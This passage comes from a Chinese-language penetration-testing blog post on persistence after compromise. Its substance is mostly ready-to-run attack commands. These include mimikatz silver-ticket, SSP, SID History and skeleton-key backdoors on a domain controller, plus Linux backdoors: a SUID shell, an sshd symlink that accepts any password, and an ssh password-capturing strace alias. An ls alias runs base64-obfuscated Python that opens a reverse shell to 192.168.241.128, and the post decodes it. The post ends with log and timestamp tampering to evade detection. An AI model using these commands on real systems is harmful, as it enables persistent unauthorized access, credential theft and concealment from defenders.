<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029234312908.png" alt="image-20231029234312908"></p>
<p>再次查看 \dc\c$ 发现时就有权限了</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995960-720803-image.png" alt="img"></p>
<p>PsExec 也同样可以</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029161651010.png" alt="image-20231029161651010"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995968-949523-image.png" alt="img"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029162219603.png" alt="image-20231029162219603"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029162836729.png" alt="image-20231029162836729"></p>
<h2 id="2、白银票据"><a href="#2、白银票据" class="headerlink" title="2、白银票据"></a>2、白银票据</h2><p>白银票据和黄金票据的区别如下：</p>
<ol>
<li>白银票据不经过 KDC，因此白银票据日志相对于黄金票据会更少，同时白银票据的日志都在目标服务器上，域控上不会有日志，因此白银票据更加隐蔽。</li>
<li>白银票据利用服务账户的哈希值，不同于黄金票据利用 krbtgt 账户的哈希值，所以白银票据的权限就远不如黄金票据的权限了。</li>
</ol>
<p>想利用白银票据需要先具备以下信息：</p>
<ul>
<li>域名</li>
<li>域 SID</li>
<li>目标服务器的 FQDN 即完整的域名</li>
<li>可利用的服务</li>
<li>服务账户的 NTLM 哈希</li>
<li>伪造的用户名即任意用户名</li>
</ul>
<p>下面以伪造 CIFS 服务的权限为例：</p>
<ol>
<li>CIFS 服务常用于 Windows 主机之间的文件共享，首先使用 mimikatz 获取服务账户的 NTLM 哈希，这里使用的 Username 为 DC$ 的 NTLM 哈希</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">.\mimikatz.exe log &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; exit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029164442629.png" alt="image-20231029164442629"></p>
<p>补充：用户名末尾的$符</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029170542160.png" alt="image-20231029170542160"></p>
<ol>
<li>利用获取到的 Hash 生成白银票据</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">.\mimikatz.exe &quot;kerberos::golden &#x2F;user:t &#x2F;domain:teamssix.com &#x2F;sid:S-1-5-21-284927032-1122706408-2778656994 &#x2F;target:dc &#x2F;rc4:ef9e49a41feaa171f642016fd4cb7e7a &#x2F;service:cifs &#x2F;ptt&quot; exit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995979-523341-image.png" alt="img"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029171030803.png" alt="image-20231029171030803"></p>
<ol>
<li>伪造票据后，使用 dir 命令就能获取到目标的 CIFS 服务权限了，除了 CIFS 服务外，还可以伪造 LDAP 等等服务</li>
</ol>
<h2 id="3、SSP权限维持"><a href="#3、SSP权限维持" class="headerlink" title="3、SSP权限维持"></a>3、SSP权限维持</h2><p>说明：通过 SSP 权限维持，用户在登录时，密码将会以明文的形式保存在 C:\Windows\System32\mimilsa.log 下。使用 mimikatz 将伪造的 SSP 注入内存，但如果域控重启，被注入内存的伪造 SSP 就会丢失。</p>
<pre class="line-numbers language-none"><code class="language-none">#在Mimikatz中执行
privilege::debug
misc::memssp<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030105213575.png" alt="image-20231030105213575"></p>
<p>注销当前用户，输入用户名密码后重新登录，就可以获取到明文密码了</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642996014-193247-image.png" alt="img"></p>
<p>也可以使用 mimikatz 中的 mimilib.dll 文件进行 SSP 权限维持，这种方法重启后不会失效。</p>
<h2 id="4、SID-History后门"><a href="#4、SID-History后门" class="headerlink" title="4、SID History后门"></a>4、SID History后门</h2><p>说明：每个用户都有自己的安全标识符即 SID，SID History的作用是在域迁移过程中保持域用户的访问权限，即如果迁移后用户的SID改变了，系统会将其原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。</p>
<p>操作手法：</p>
<ol>
<li>这里使用 mimikatz 将管理员的 SID 添加到普通用户的 SID History 中</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">privilege::debug
sid::patch
sid::add &#x2F;sam:test &#x2F;new:administrator<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642996022-70539-image.png" alt="img"></p>
<ol>
<li>使用 test 用户登录，可以看到已经拥有了管理员权限</li>
</ol>
<p><img src="https://huoxian-community.oss-cn-beijing.aliyuncs.com/2022-01-24/1642996033-818900-image.png" alt="img" style="zoom:200%;"></p>
<h2 id="5、万能密码"><a href="#5、万能密码" class="headerlink" title="5、万能密码"></a>5、万能密码</h2><p>说明：在域管权限下，使用 mimikatz 即可</p>
<pre class="line-numbers language-none"><code class="language-none">.\mimikatz.exe &quot;privilege::debug&quot; &quot;misc::skeleton&quot; exit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642996044-182676-image.png" alt="img"></p>
<p>此时，就可以在域内以任意用户的身份利用 mimikatz 密码进行登录了</p>
<pre class="line-numbers language-none"><code class="language-none">net use \\dc\ipc$ &quot;mimikatz&quot; &#x2F;user:teamssix\administrator<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029173359750.png" alt="image-20231029173359750"></p>
<p>IPC$共享是Windows系统中的一个特殊隐藏共享，用于进程间通信。通过建立与IPC$共享的连接，可以与远程计算机进行某些操作，例如执行命令、访问共享文件夹等。</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642996053-90546-image.png" alt="img"></p>
<p>除了上面的方法外，还可以使用 DSRM 账号进行权限维持，也可以使用 Hook PasswordChangeNotify 脚本查看目标用户修改后的新密码。</p>
<h1 id="Linux主机后门"><a href="#Linux主机后门" class="headerlink" title="Linux主机后门"></a>Linux主机后门</h1><h2 id="1、添加用户"><a href="#1、添加用户" class="headerlink" title="1、添加用户"></a>1、添加用户</h2><pre class="line-numbers language-none"><code class="language-none">#一句话添加用户（test:123456）
useradd test;echo -e &quot;123456\n123456\n&quot; |passwd test
#或者使用openssl
useradd -p &#96;openssl passwd -1 -salt &#39;salt&#39; 123456&#96; guest<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="2、SUID-Shell"><a href="#2、SUID-Shell" class="headerlink" title="2、SUID Shell"></a>2、SUID Shell</h2><p>说明：SUID Shell是一种可用于以拥有者权限运行的shell</p>
<pre class="line-numbers language-none"><code class="language-none">#以root用户权限执行下面的命令
cp &#x2F;bin&#x2F;bash &#x2F;tmp&#x2F;shell
chmod u+s &#x2F;tmp&#x2F;shell
#在使用普通用户权限的时候，执行以下命令就能获取root权限
&#x2F;tmp&#x2F;shell -p<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642996062-570634-image.png" alt="img"></p>
<h2 id="3、软链接"><a href="#3、软链接" class="headerlink" title="3、软链接"></a>3、软链接</h2><p>说明：软链接的利用前提是 ssh 配置中开启了 PAM 进行身份验证</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029193747195.png" alt="image-20231029193747195"></p>
<pre class="line-numbers language-none"><code class="language-none">#使用以下命令查看是否配置PAM认证
cat &#x2F;etc&#x2F;ssh&#x2F;sshd_config | grep UsePAM
#在目标主机上创建一句话后门
ln -sf &#x2F;usr&#x2F;sbin&#x2F;sshd &#x2F;tmp&#x2F;su;&#x2F;tmp&#x2F;su -oPort&#x3D;8888
#然后直接ssh root@IP -p 8888，输入任意密码，就可以登录<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030105239917.png" alt="image-20231030105239917"></p>
<h2 id="4、strace后门-或称alias-后门"><a href="#4、strace后门-或称alias-后门" class="headerlink" title="4、strace后门(或称alias 后门)"></a>4、strace后门(或称alias 后门)</h2><p>alias命令介绍：</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029200325656.png" alt="image-20231029200325656"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029200428340.png" alt="image-20231029200428340"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030105401109.png" alt="image-20231030105401109"></p>
<p>strace命令介绍：</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029195323749.png" alt="image-20231029195323749"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029195352272.png" alt="image-20231029195352272"></p>
<p>利用方式：</p>
<pre class="line-numbers language-none"><code class="language-none">alias ssh&#x3D;&#39;strace -o &#x2F;tmp&#x2F;.ssh.log -e read,write,connect -s 2048 ssh&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>这时当用户使用 ssh 连接其他主机时，在 /tmp/.ssh.log 下就能看到连接的密码、操作了，只是显示的不是很直观，如下</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030105433940.png" alt="image-20231030105433940"></p>
<p>另一种利用方式</p>
<pre class="line-numbers language-none"><code class="language-none">alias ls&#x3D;&#39;alerts()&#123; ls $* --color&#x3D;auto;python3 -c &quot;import base64,sys;exec(base64.b64decode(&#123;2:str,3:lambda b:bytes(b,&#39;\&#39;&#39;UTF-8&#39;\&#39;&#39;)&#125;[sys.version_info[0]](&#39;\&#39;&#39;aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4yNDEuMTI4IiwgNjY2NikpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDIpCiAgICAgICAgcCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCAiLWkiXSkKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICBleGl0KCk&#x3D;&#39;\&#39;&#39;)))&quot;;&#125;;alerts&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>上面的 base64 解码后为以下内容</p>
<pre class="line-numbers language-none"><code class="language-none">import os,socket,subprocess;
ret &#x3D; os.fork()
if ret &gt; 0:
    exit()
else:
    try:
        s &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((&quot;192.168.241.128&quot;, 6666))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p &#x3D; subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;, &quot;-i&quot;])
    except Exception as e:
        exit()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这样当用户使用 ls 命令时，就会反弹 shell 回来了，当然除了反弹 shell 还可以做很多的其他操作</p>
<h2 id="5、使用screen命令后台运行"><a href="#5、使用screen命令后台运行" class="headerlink" title="5、使用screen命令后台运行"></a>5、使用screen命令后台运行</h2><p>说明：利用screen命令让命令在后台运行实现权限维持</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029211243551.png" alt="image-20231029211243551"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029211419320.png" alt="image-20231029211419320"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029211428846.png" alt="image-20231029211428846"></p>
<pre class="line-numbers language-none"><code class="language-none">#发现screen
#查看进程寻找
ps -aux | grep screen
#或者 screen -ls 可以看到当前是否有 screen 在后台运行

#使用screen建立新的终端
screen -S screenname
#Ctrl+a+d(Mac 是 control+a+d)退出 screen 并使命令在后台运行
#screen -r screenname 进入刚才的终端<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>除此之外，还有比较常见的定时任务、SSH 公钥登录以及 SSH warpper、openssh 后门、PAM 后门、rootkit 后门等等</p>
</blockquote>
<h1 id="Linux文件隐藏"><a href="#Linux文件隐藏" class="headerlink" title="Linux文件隐藏"></a>Linux文件隐藏</h1><h2 id="1、隐藏文件时间戳"><a href="#1、隐藏文件时间戳" class="headerlink" title="1、隐藏文件时间戳"></a>1、隐藏文件时间戳</h2><pre class="line-numbers language-none"><code class="language-none">#复制其他文件的时间
touch -r teamssix.txt evil.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029195215049.png" alt="image-20231029195215049"></p>
<pre class="line-numbers language-none"><code class="language-none">#自定义文件的时间，这里演示将时间改为 2022 年的 1 月 1 日 1 时 1 分 1 秒
touch -t 202201010101.01 evil.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030105452885.png" alt="image-20231030105452885"></p>
<h2 id="2、隐身登录"><a href="#2、隐身登录" class="headerlink" title="2、隐身登录"></a>2、隐身登录</h2><p>说明：隐身登录系统，不会被 w、who、last 检测到</p>
<p>w命令介绍：</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029204745282.png" alt="image-20231029204745282"></p>
<pre class="line-numbers language-none"><code class="language-none">#显示当前登录用户的信息
w
#显示短格式的用户信息
w -s
#显示用户的空闲时间
w -u
#显示用户的登录IP地址
w -i<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029204956273.png" alt="image-20231029204956273"></p>
<p>last命令介绍：</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029204346797.png" alt="image-20231029204346797"></p>
<pre class="line-numbers language-none"><code class="language-none">#显示最近的登录记录
last
#显示特定用户的登录记录
last username
#显示最近的10条登录记录
last -n 10
#显示登录IP地址
last -i
#显示指定时间范围内的登录记录
last --since &quot;2023-10-01&quot; --until &quot;2023-10-15&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>隐身登录手法：</p>
<pre class="line-numbers language-none"><code class="language-none">#一般隐身登录
ssh -T root@host &#x2F;bin&#x2F;bash -i
#隐身登录系统，同时不保存公钥在本地的 .ssh 目录中
ssh -o UserKnownHostsFile&#x3D;&#x2F;dev&#x2F;null -T user@host &#x2F;bin&#x2F;bash –i<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="3、锁定文件"><a href="#3、锁定文件" class="headerlink" title="3、锁定文件"></a>3、锁定文件</h2><p>说明：当文件被锁定时，是无法删除的</p>
<pre class="line-numbers language-none"><code class="language-none">#锁定文件
chattr +i evil.txt
#属性查看
lsattr  evil.txt
#解除锁定
chattr -i evil.txt
#删除文件
rm -rf 1.evil.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030094648542.png" alt="image-20231030094648542"></p>
<h2 id="4、隐藏历史操作记录"><a href="#4、隐藏历史操作记录" class="headerlink" title="4、隐藏历史操作记录"></a>4、隐藏历史操作记录</h2><pre class="line-numbers language-none"><code class="language-none">#临时禁用历史命令记录功能（注意在 set 命令前有一个空格）
 set +o history
#如果想某条命令不记录到 history 中，直接在命令前加上空格就行，如 ls、 pwd<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231030094351564.png" alt="image-20231030094351564"></p>
<pre class="line-numbers language-none"><code class="language-none">#或者使用grep过滤出history中要删除的文件行，再 -d 指定行即可删除，比如第11行记录
history | grep &quot;key&quot;
history -d 11<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>除此之外，还有在文件前加上 . 实现隐藏文件以及端口复用、进程隐藏等等方法。</p>
</blockquote>
<h1 id="鸣谢"><a href="#鸣谢" class="headerlink" title="鸣谢"></a>鸣谢</h1><ul>
<li><a target="_blank" rel="noopener" href="https://zone.huoxian.cn/d/860/2">https://zone.huoxian.cn/d/860/2</a></li>
</ul>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a href="/2023/10/29/渗透之常识/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2023/10/25/信息收集手法备忘录/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2023-10-28 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/渗透测试/">渗透测试<span>27</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Windows%E4%B8%BB%E6%9C%BA%E5%90%8E%E9%97%A8"><span class="toc-article-text">Windows主机后门</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#1%E3%80%81%E9%9A%90%E8%97%8F%E8%B4%A6%E5%8F%B7"><span class="toc-article-text">1、隐藏账号</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#2%E3%80%81%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-article-text">2、计划任务</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#3%E3%80%81shift%E5%90%8E%E9%97%A8"><span class="toc-article-text">3、shift后门</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#4%E3%80%81%E7%BB%84%E7%AD%96%E7%95%A5"><span class="toc-article-text">4、组策略</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#5%E3%80%81%E6%B3%A8%E5%86%8C%E8%A1%A8"><span class="toc-article-text">5、注册表</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#6%E3%80%81%E6%9C%8D%E5%8A%A1%E8%87%AA%E5%90%AF%E5%8A%A8"><span class="toc-article-text">6、服务自启动</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#7%E3%80%81nishang%E5%90%8E%E9%97%A8"><span class="toc-article-text">7、nishang后门</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#HTTP-Backdoor"><span class="toc-article-text">HTTP-Backdoor</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Add-ScrnSaveBackdoor"><span class="toc-article-text">Add-ScrnSaveBackdoor</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Windows%E6%96%87%E4%BB%B6%E9%9A%90%E8%97%8F"><span class="toc-article-text">Windows文件隐藏</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#1%E3%80%81%E6%96%87%E4%BB%B6%E5%B1%9E%E6%80%A7"><span class="toc-article-text">1、文件属性</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#2%E3%80%81ADS"><span class="toc-article-text">2、ADS</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#3%E3%80%81%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E5%A4%B9%E4%BC%AA%E8%A3%85"><span class="toc-article-text">3、系统文件夹伪装</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E5%9F%9F%E5%90%8E%E9%97%A8"><span class="toc-article-text">域后门</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#1%E3%80%81%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="toc-article-text">1、黄金票据</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#2%E3%80%81%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE"><span class="toc-article-text">2、白银票据</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#3%E3%80%81SSP%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-article-text">3、SSP权限维持</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#4%E3%80%81SID-History%E5%90%8E%E9%97%A8"><span class="toc-article-text">4、SID History后门</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#5%E3%80%81%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="toc-article-text">5、万能密码</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Linux%E4%B8%BB%E6%9C%BA%E5%90%8E%E9%97%A8"><span class="toc-article-text">Linux主机后门</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#1%E3%80%81%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"><span class="toc-article-text">1、添加用户</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#2%E3%80%81SUID-Shell"><span class="toc-article-text">2、SUID Shell</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#3%E3%80%81%E8%BD%AF%E9%93%BE%E6%8E%A5"><span class="toc-article-text">3、软链接</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#4%E3%80%81strace%E5%90%8E%E9%97%A8-%E6%88%96%E7%A7%B0alias-%E5%90%8E%E9%97%A8"><span class="toc-article-text">4、strace后门(或称alias 后门)</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#5%E3%80%81%E4%BD%BF%E7%94%A8screen%E5%91%BD%E4%BB%A4%E5%90%8E%E5%8F%B0%E8%BF%90%E8%A1%8C"><span class="toc-article-text">5、使用screen命令后台运行</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Linux%E6%96%87%E4%BB%B6%E9%9A%90%E8%97%8F"><span class="toc-article-text">Linux文件隐藏</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#1%E3%80%81%E9%9A%90%E8%97%8F%E6%96%87%E4%BB%B6%E6%97%B6%E9%97%B4%E6%88%B3"><span class="toc-article-text">1、隐藏文件时间戳</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#2%E3%80%81%E9%9A%90%E8%BA%AB%E7%99%BB%E5%BD%95"><span class="toc-article-text">2、隐身登录</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#3%E3%80%81%E9%94%81%E5%AE%9A%E6%96%87%E4%BB%B6"><span class="toc-article-text">3、锁定文件</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#4%E3%80%81%E9%9A%90%E8%97%8F%E5%8E%86%E5%8F%B2%E6%93%8D%E4%BD%9C%E8%AE%B0%E5%BD%95"><span class="toc-article-text">4、隐藏历史操作记录</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E9%B8%A3%E8%B0%A2"><span class="toc-article-text">鸣谢</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->





	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  &copy; 2024 Jici
  
      with help from <a href="http://hexo.io/" target="_blank">Hexo</a>    
</p>

  <script src='https://unpkg.com/mermaid@7.1.2/dist/mermaid.min.js'></script>
  <script>
    if (window.mermaid) {
      mermaid.initialize({theme: 'forest'});
    }
  </script>



<span class="post-meta-divider">|</span>
本站总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>&nbsp;次</span>

<script>
var bszCaller,bszTag;!function(){var c,d,e,a=!1,b=[];ready=function(c){return a||"interactive"===document.readyState||"complete"===document.readyState?c.call(document):b.push(function(){return c.call(this)}),this},d=function(){for(var a=0,c=b.length;c>a;a++)b[a].apply(document);b=[]},e=function(){a||(a=!0,d.call(window),document.removeEventListener?document.removeEventListener("DOMContentLoaded",e,!1):document.attachEvent&&(document.detachEvent("onreadystatechange",e),window==window.top&&(clearInterval(c),c=null)))},document.addEventListener?document.addEventListener("DOMContentLoaded",e,!1):document.attachEvent&&(document.attachEvent("onreadystatechange",function(){/loaded|complete/.test(document.readyState)&&e()}),window==window.top&&(c=setInterval(function(){try{a||document.documentElement.doScroll("left")}catch(b){return}e()},5)))}(),bszCaller={fetch:function(a,b){var c="BusuanziCallback_"+Math.floor(1099511627776*Math.random());window[c]=this.evalCall(b),a=a.replace("=BusuanziCallback","="+c),scriptTag=document.createElement("SCRIPT"),scriptTag.type="text/javascript",scriptTag.defer=!0,scriptTag.src=a,scriptTag.referrerPolicy="no-referrer-when-downgrade",document.getElementsByTagName("HEAD")[0].appendChild(scriptTag)},evalCall:function(a){return function(b){ready(function(){try{a(b),scriptTag.parentElement.removeChild(scriptTag)}catch(c){bszTag.hides()}})}}},bszCaller.fetch("//busuanzi.ibruce.info/busuanzi?jsonpCallback=BusuanziCallback",function(a){bszTag.texts(a),bszTag.shows()}),bszTag={bszs:["site_pv","page_pv","site_uv"],texts:function(a){this.bszs.map(function(b){var c=document.getElementById("busuanzi_value_"+b);c&&(c.innerHTML=a[b])})},hides:function(){this.bszs.map(function(a){var b=document.getElementById("busuanzi_container_"+a);b&&(b.style.display="none")})},shows:function(){this.bszs.map(function(a){var 